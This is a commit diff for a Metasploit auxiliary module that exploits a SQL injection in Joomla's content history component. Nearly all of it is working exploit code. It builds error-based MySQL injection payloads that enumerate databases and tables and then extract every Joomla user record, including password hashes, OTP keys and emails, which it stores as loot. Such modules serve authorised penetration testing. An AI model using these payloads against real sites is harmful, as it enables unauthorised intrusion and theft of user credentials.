Skip to content

Commit 07d549d

Browse files
brandonprrybrandonprry
committed
Update joomla_contenthistory_sqli.rb
Remove sessions for now
1 parent e4281dd commit 07d549d

File tree

1 file changed

+50
-55
lines changed

1 file changed

+50
-55
lines changed

modules/auxiliary/gather/joomla_contenthistory_sqli.rb

Lines changed: 50 additions & 55 deletions
Original file line numberDiff line numberDiff line change
@@ -58,69 +58,64 @@ def run
5858
left_marker = Rex::Text.rand_text_alpha(5)
5959
right_marker = Rex::Text.rand_text_alpha(5)
6060

61-
if datastore['ACTION'] == 'HASHES'
62-
db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
63-
res = sqli(db_count)
64-
db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
65-
66-
dbs = []
67-
0.upto(db_count-1) do |i|
68-
db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
61+
db_count = "AND (SELECT 6062 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
62+
res = sqli(db_count)
63+
db_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
64+
65+
dbs = []
66+
0.upto(db_count-1) do |i|
67+
db = "AND (SELECT 2255 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
68+
res = sqli(db)
69+
dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
70+
end
6971

70-
res = sqli(db)
71-
dbs << $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
72+
dbs.delete('performance_schema')
73+
dbs.delete('information_schema')
74+
dbs.delete('mysql')
75+
76+
users = []
77+
dbs.each do |db|
78+
vprint_status("Found database: " + db)
79+
tables = []
80+
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
81+
res = sqli(table_count)
82+
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
83+
84+
0.upto(table_count-1) do |i|
85+
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
86+
res = sqli(table)
87+
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
88+
tables << table if table =~ /_users$/
7289
end
7390

74-
dbs.delete('performance_schema')
75-
dbs.delete('information_schema')
76-
dbs.delete('mysql')
77-
78-
users = []
79-
dbs.each do |db|
80-
81-
tables = []
82-
table_count = "AND (SELECT 8640 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]})),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
83-
res = sqli(table_count)
84-
table_count = $1.to_i || 0 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
85-
86-
0.upto(table_count-1) do |i|
87-
table = "AND (SELECT 2474 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x#{db.unpack("H*")[0]}) LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
88-
res = sqli(table)
89-
table = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
90-
tables << table if table =~ /_users$/
91-
end
92-
93-
tables.each do |table|
94-
95-
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
96-
res = sqli(user_count)
97-
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
98-
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
99-
100-
0.upto(user_count-1) do |i|
101-
user = {}
102-
cols.each do |col|
103-
k = 1
104-
val = nil
105-
user[col] = ''
106-
while val != ''
107-
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
108-
res = sqli(get_col)
109-
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
110-
user[col] << val
111-
k = k + 54
112-
end
91+
tables.each do |table|
92+
vprint_status("Found table: " + table)
93+
user_count = "AND (SELECT 3737 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM #{db}.#{table}),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
94+
res = sqli(user_count)
95+
user_count = $1.to_i if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
96+
cols = ["activation","block","email","id","lastResetTime","lastvisitDate","name","otep","otpKey","params","password","registerDate","requireReset","resetCount","sendEmail","username"]
97+
98+
0.upto(user_count-1) do |i|
99+
user = {}
100+
cols.each do |col|
101+
k = 1
102+
val = nil
103+
user[col] = ''
104+
while val != ''
105+
get_col = "AND (SELECT 7072 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),#{k},54) FROM #{db}.#{table} ORDER BY id LIMIT #{i},1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
106+
res = sqli(get_col)
107+
val = $1 if res and res.body =~ /#{left_marker}(.*)#{right_marker}/
108+
user[col] << val
109+
k = k + 54
113110
end
114-
users << user
115111
end
112+
users << user
116113
end
117114
end
118-
p users.to_json
119-
elsif datastore['ACTION'] == 'SESSIONS'
120-
121-
else
122-
fail_with(Failure::Unknown, "The ACTION " + datastore['ACTION'] + " is not supported.")
123115
end
116+
117+
path = store_loot('joomla.file', 'text/plain', datastore['RHOST'], users.to_json, 'joomla.users')
118+
print_good("Users saved to file: " + path)
124119
end
125120

126121
def sqli(payload)

0 commit comments

Comments
 (0)